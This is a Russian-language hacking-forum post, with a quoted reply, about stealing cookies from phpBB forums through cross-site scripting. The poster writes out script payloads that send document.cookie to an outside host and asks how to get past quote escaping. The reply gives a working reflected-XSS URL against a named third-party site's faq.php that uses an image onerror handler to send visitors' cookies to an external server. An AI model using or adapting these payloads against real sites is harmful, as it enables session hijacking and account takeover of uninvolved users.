Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script>document.location="www.asd.as/as.php?xack="+document.cookie</script>, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script>document.location&#61&#34www.asd.as/as.php?xack&#61&#34&#43document.cookie</script>, то строка выполняется только до "<script>document.location=" и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика? PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
Вот так работает </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cookie>st&faq[0][1]=test [/QUOTE]<span id='postcolor'>
